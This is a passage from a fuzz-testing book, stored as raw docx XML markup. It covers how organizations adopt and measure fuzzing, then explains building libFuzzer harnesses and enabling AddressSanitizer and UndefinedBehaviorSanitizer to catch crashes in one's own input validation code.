        <w:t xml:space="preserve">because different approaches excel in different scenarios. AFL++ for complex file processing, libFuzzer for performance-critical library functions, FuzzTest for business logic validation, and OSS-Fuzz for organizational coordination. The tools complement rather than compete with each other.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="X749b82021550ad59dae6a7e8c4323cbca5f65e0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Where Fuzzing Fits: Organizational and Environmental Context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuzzing works in any development environment, but thrives in certain organizational contexts. Teams with established CI/CD pipelines and automated testing integrate fuzzing more easily than those still building deployment automation. The key factor isn’t team size—​it’s organizational maturity and existing infrastructure capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cloud environments offer elastic compute resources that scale automatically during intensive campaigns, making them ideal for teams prioritizing operational simplicity. AWS, Google Cloud, and Azure provide infrastructure that scales up for intensive campaigns and scales down to minimize costs. On-premise environments provide greater control over sensitive code and data, appealing to regulated industries with compliance requirements. Financial services and healthcare organizations often prefer on-premise fuzzing to maintain data residency compliance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Team structure significantly influences implementation approaches. Small teams (2-8 developers) typically start with libFuzzer for direct function testing because it requires minimal infrastructure setup. Medium teams (10-30 developers) often adopt AFL++ for file-based testing while building CI integration expertise. Large organizations (50+ developers) benefit from OSS-Fuzz or custom enterprise platforms that coordinate testing across multiple repositories and development teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Centralized platform teams can build sophisticated fuzzing infrastructure that serves multiple development teams, while distributed teams where each squad owns their testing typically start with simpler tools before graduating to enterprise platforms. A five-person startup with strong testing culture often implements effective fuzzing faster than a hundred-person company with ad-hoc quality practices.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="X5d0c89bdc17ca36aa481bd7a26264167abf0bd4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration Patterns and Workflow Considerations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern fuzzing tools integrate with standard development practices through continuous integration pipelines, automated bug reporting, and systematic coverage measurement. The goal is making fuzzing feel like enhanced unit testing rather than additional security scanning that competes with development velocity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effective integration provides multiple feedback loops optimized for different development scenarios. Quick validation cycles run limited fuzzing campaigns on every commit to catch obvious regressions. Comprehensive background testing explores deep application states during off-peak hours. Intensive periodic campaigns provide thorough validation before major releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Timing your fuzzing adoption requires strategic sequencing. Start during stable development phases rather than crisis periods when teams lack bandwidth for new tool adoption. Begin with non-critical applications to build expertise before applying fuzzing to mission-critical systems. Plan initial campaigns during slower business cycles when discovered bugs won’t disrupt release schedules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Project lifecycle integration follows predictable patterns. Early development phases benefit from property-based testing that validates business logic assumptions. Feature development stages require fast feedback cycles that catch regressions immediately. Pre-release phases warrant intensive campaigns that explore edge cases thoroughly. Post-release maintenance uses continuous fuzzing to prevent regressions as code evolves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource management becomes crucial for sustainable integration that provides value without overwhelming available infrastructure. Parallel execution across multiple machines, priority-based scheduling that focuses on critical components, and automatic resource scaling enable comprehensive testing while maintaining cost efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Teams configure different fuzzing intensities based on code change significance and risk assessment. Simple bug fixes might trigger short validation campaigns, while major feature additions warrant comprehensive exploration that runs for hours or days to ensure thorough coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The workflow integration becomes natural when fuzzing provides immediate feedback during active development. Teams configure continuous integration pipelines to run fuzzing campaigns on every commit, catching regressions within minutes rather than discovering problems during staging or production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successful teams treat fuzzing as reliability engineering that enhances development confidence rather than compliance requirements that slow feature delivery. This positioning encourages adoption and regular use while building organizational expertise that multiplies effectiveness over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The key insight is that fuzzing works best when it complements existing testing practices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rather than replacing them. Unit tests validate expected behaviors, integration tests verify documented workflows, and fuzzing discovers the edge cases that manual testing would never explore. Together, they provide comprehensive confidence in application reliability.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="44" w:name="X542ab7061808fd6b0755656d512433d26a8f19a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Measuring Success and ROI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Organizations adopting fuzzing need frameworks for measuring effectiveness beyond simple bug discovery counts. The most valuable metrics track reliability improvements, cost avoidance, and organizational capability development that justify continued investment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coverage metrics provide objective measures of testing thoroughness by tracking the percentage of application code exercised during fuzzing campaigns. However, coverage percentages alone don’t indicate testing quality since high coverage through shallow testing may miss deep bugs that comprehensive exploration would discover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bug discovery rate trends reveal program effectiveness over time while accounting for application evolution and testing intensity variations. Mature fuzzing programs typically show declining discovery rates as applications become more robust, but trend analysis should distinguish between genuine reliability improvements and testing saturation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Production incident correlation provides the ultimate validation of fuzzing program effectiveness by tracking whether fuzzing discoveries prevent real-world failures. Organizations with systematic fuzzing report measurable reductions in production reliability incidents and security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cost-benefit analysis should account for prevented failures rather than just testing investment. A fuzzing campaign that discovers a critical vulnerability before production deployment prevents potential incident response costs, regulatory fines, and reputation damage that could exceed testing investment by orders of magnitude.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="X364661df51f4fdba69dbe3d884fc0a9bf5d2c69"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What Comes Next</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You now understand what fuzz testing is, where it came from, and how modern tools approach the challenge of systematic reliability validation. You’ve seen why traditional testing approaches hit mathematical limits when dealing with complex applications, and how automated exploration scales beyond human capabilities while maintaining systematic coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The foundation is complete—​now comes the fun part.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">You understand the difference between coverage-guided and random fuzzing. You know when to choose AFL++ versus libFuzzer versus property-based testing. You can recognize scenarios where fuzzing provides the greatest value for your specific applications and development context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve also seen the organizational benefits across different roles—​how development teams gain deployment confidence, how platform teams multiply their impact, how security engineers expand vulnerability discovery, and how DevOps teams automate reliability validation. The business case is clear: systematic exploration prevents failures that cost significantly more to remediate in production than to discover during development.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next chapter moves from conceptual understanding to practical implementation. You’ll install fuzzing tools, write your first harnesses, and execute actual fuzzing campaigns that discover real bugs in sample applications. The theory transforms into practice as you experience firsthand how systematic exploration reveals failures that manual testing would never find.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Most importantly, you now think like a fuzzer.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Instead of asking "what should I test?" you’re asking "what assumptions am I making about input validity?" Instead of writing tests for expected behaviors, you’re ready to validate that applications handle the unexpected gracefully. Instead of hoping edge cases won’t cause problems, you’ll systematically explore them during development when fixes are easy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The journey from manual testing to systematic exploration starts with understanding why automation scales beyond human capabilities. You’ve got that understanding. Time to put it into practice.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="75" w:name="Xc7d1488dd9f523d249c00c0c57814515d14fe2d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 2: Fix Input Processing Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">"The best time to fix a crash is before your users find it."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your JSON API just crashed in production. The service that processes user profile updates segfaulted and took down the entire user management system. Customer support fields angry calls while engineers scramble to restart services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The crash occurred in JSON parsing code, triggered by what appeared to be a normal profile update request. But the stack trace reveals a buffer overflow in email validation, caused by a Unicode string that manual testing never considered. A single malformed email address brought down the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This scenario—​input processing failures causing service outages—​represents the most preventable class of reliability problems. This chapter teaches you systematic testing that catches these failures during development, transforming reliability from reactive firefighting into proactive prevention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What You’ll Build:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll master libFuzzer to systematically test input processing reliability. Starting with a simple harness that finds crashes in basic functions, you’ll progressively add sanitizer detection, structured input generation, and performance optimization. Each technique builds practical skills that prevent production outages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The libFuzzer concepts you learn apply directly to Jazzer (Java), Atheris (Python), and Jazzer.js (JavaScript), making this foundation valuable across your entire technology stack.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="51" w:name="X97d9a1dd6574ee552adfcf60a32c97a36a3b244"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build a Harness That Finds Real Crashes in 20 Minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stop wondering whether your input processing has hidden failures. This section shows you how to build a libFuzzer harness that systematically explores edge cases and discovers real crashes in functions you thought were solid.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="48" w:name="X3abdd08fa99a8711e959846b6c74d5d2197a128"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create Your First Crash-Finding Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LibFuzzer transforms testing from guessing which inputs might cause problems to systematically exploring millions of input combinations. Instead of writing individual test cases for specific inputs, you write one harness function that converts libFuzzer’s generated byte arrays into the data structures your application expects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The harness follows a predictable pattern that you’ll use across all fuzzing: receive data and size from libFuzzer, convert raw input into the format your function expects, call your target function, return zero to continue testing. This same pattern works identically in Jazzer for Java, Atheris for Python, and Jazzer.js for JavaScript—​only the syntax changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let’s walk through building this harness step by step. Your email validation function probably looks something like</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bool validate_email(const char* email)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The libFuzzer harness needs to bridge between libFuzzer’s byte arrays and your function’s string parameter while exploring edge cases systematically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First, handle the input conversion carefully. Don’t just cast the byte array to a string—​ensure null termination and handle the size parameter correctly. This prevents crashes in your harness itself while allowing crashes in your target function to surface clearly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Second, consider input filtering. You might reject inputs that are too short to be valid emails or too long to be reasonable. But be careful not to filter too aggressively—​you want to explore boundary conditions, not just obviously valid cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Third, understand that libFuzzer will try millions of input combinations. Some will be completely random bytes, others will be mutations of previous inputs that reached new code paths. The magic happens when libFuzzer finds an input that reaches new branches in your email validation logic.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="X3ab839e7c4acdba345d8a730c57faf6a77fb926"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Watch Coverage-Guided Discovery in Action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here’s what makes libFuzzer powerful: it learns from each test execution. When an input reaches a new basic block in your code, libFuzzer saves that input and uses it to generate more test cases. This creates systematic exploration rather than random testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run your email harness for 10 minutes and watch the statistics. You’ll see libFuzzer report "NEW" whenever it finds an input that reaches previously unexplored code. Each NEW discovery becomes a seed for further exploration, building a corpus of interesting inputs that systematically explore your validation logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The coverage information shows you exactly which parts of your email validation function libFuzzer has exercised. Functions with complex conditional logic—​multiple validation steps, Unicode handling, length checks—​provide rich exploration opportunities. Simple functions might reach full coverage quickly, while complex ones reveal new paths for hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This coverage-guided approach is why libFuzzer finds edge cases that manual testing misses. Instead of randomly guessing which email formats might cause problems, it systematically explores every branch of your validation logic to find the precise inputs that trigger failures.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="X97c0980cac7291b1f512c5e13f3c46c4686c68c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build Confidence Through Systematic Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After running your email harness for 30 minutes, you’ll have concrete evidence about your function’s reliability. LibFuzzer will report how many test cases it executed, how much coverage it achieved, and any crashes it discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This transforms your confidence from "I tested some obvious cases" to "I systematically explored 2.3 million input combinations." You move from hope-based testing to evidence-based verification. If libFuzzer finds no crashes after extensive exploration, you have strong evidence that your email validation handles edge cases correctly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document this transformation. Before fuzzing, you probably had a handful of manual test cases: valid emails, obviously invalid formats, empty strings. After fuzzing, you have systematic verification across millions of edge cases including Unicode boundary conditions, length limits, and format variations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This confidence transformation prepares you perfectly for Part II where you’ll apply identical concepts to Java APIs, Python web services, and JavaScript applications. The mental model—​systematic exploration builds confidence—​remains the same across all languages.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:id="56" w:name="X43b5608b5ba46dcf97a127c03149d0ecbd327e8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add Immediate Crash Detection With Sanitizers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual debugging of crashes wastes hours reconstructing failure conditions from cryptic stack traces. This section shows you how sanitizers catch memory corruption and undefined behavior instantly, providing precise diagnostic information that leads directly to fixes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="52" w:name="Xa5f9d3024b8bf072a639d3224462d00c8b0552d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable AddressSanitizer for Instant Memory Corruption Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory corruption represents a dangerous class of input processing failures because it causes immediate service crashes, delayed data corruption, or unpredictable behavior that’s nearly impossible to debug in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AddressSanitizer integration follows a standard pattern you’ll use throughout your fuzzing career. Compile with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-fsanitize=address -g -O1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, link with the same flags, and run your harness. When libFuzzer generates input that triggers memory corruption, AddressSanitizer immediately provides detailed diagnostic information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The diagnostic output includes the exact type of violation (buffer overflow, use-after-free, double-free), the memory address involved, and complete stack traces showing allocation and violation points. This information leads directly to fixes rather than requiring extensive debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let’s work through a concrete example. Suppose your email validation has a buffer overflow when processing Unicode strings. Without AddressSanitizer, this might manifest as occasional segmentation faults that are difficult to reproduce. With AddressSanitizer, you get immediate, detailed reports the moment libFuzzer generates the triggering input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The report shows exactly which line of code caused the overflow, how much memory was accessed beyond the buffer boundary, and the complete call stack leading to the failure. This transforms debugging from detective work into systematic fix development.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="53" w:name="X59d3eefcae4f57f9cd0f1590b02fc989c3cdfdd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Experience the Debugging Speed Improvement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run your email harness both with and without AddressSanitizer to experience the difference. Without sanitizers, memory corruption might cause segmentation faults with minimal diagnostic information. With AddressSanitizer, the same failures produce detailed reports that pinpoint exact problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This speed improvement in debugging multiplies across your entire development process. Instead of spending hours reproducing crashes and analyzing core dumps, you get immediate feedback that leads directly to solutions. The time investment in sanitizer setup pays dividends in faster bug fixes and higher confidence in your code’s reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document this improvement: track how long it takes to understand and fix crashes with and without sanitizer assistance. You’ll find that sanitizer-assisted debugging is typically 5-10 times faster than manual debugging of cryptic crashes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="54" w:name="Xbda1de8d4e38ae68c085cd1e3d6295c8342c7d7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure UndefinedBehaviorSanitizer for Logic Error Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Undefined behavior creates input processing vulnerabilities that manifest differently across compilers and optimization levels. Code that works during development might fail in production due to undefined behavior triggered by specific input combinations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UndefinedBehaviorSanitizer follows similar integration patterns as AddressSanitizer. Compile with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-fsanitize=undefined</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, configure runtime options through environment variables, and run your fuzzing campaigns. UBSan detects integer overflows, null pointer dereferences, and type confusion errors that commonly occur during input processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The key insight is that undefined behavior often appears as "working code" that occasionally produces wrong results or crashes under specific conditions. UBSan makes these subtle problems visible immediately rather than allowing them to hide until they cause production issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For your email validation function, UBSan might catch integer overflow in length calculations, null pointer dereferences in string processing, or type confusion in character encoding conversions. These issues often don’t cause immediate crashes but create logic errors that compromise validation effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:id="55" w:name="Xe8056cd5743c52ce609189a84e789f822618599"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build a Complete Sanitizer Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Combine AddressSanitizer and UndefinedBehaviorSanitizer in your standard fuzzing workflow. This combination catches both memory corruption and logic errors, providing comprehensive verification of your input processing reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set up your build system to include sanitizer-enabled builds alongside normal builds. This makes sanitizer-assisted fuzzing a routine part of development rather than an occasional special activity. Regular sanitizer usage builds confidence that your code handles edge cases correctly across multiple failure modes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This sanitizer workflow prepares you perfectly for language-specific fuzzing in Part II. While the specific sanitizer implementations differ across Java, Python, and JavaScript, the concept of immediate failure detection remains constant. Understanding this workflow now sets you up to apply similar verification approaches across your entire technology stack.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="61" w:name="Xbcea7d2d8e66bc1556f9bdf55a91a68b91b6f01"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate Structured Inputs That Find Deep Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Random bytes rarely trigger failures in applications that expect structured data formats. This section teaches you input generation strategies that maintain format validity while exploring the boundary conditions where processing logic fails.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="57" w:name="Xf1b837b488ac1d749088c9d7008a05fe177c1e4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Master JSON Input Generation for API Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
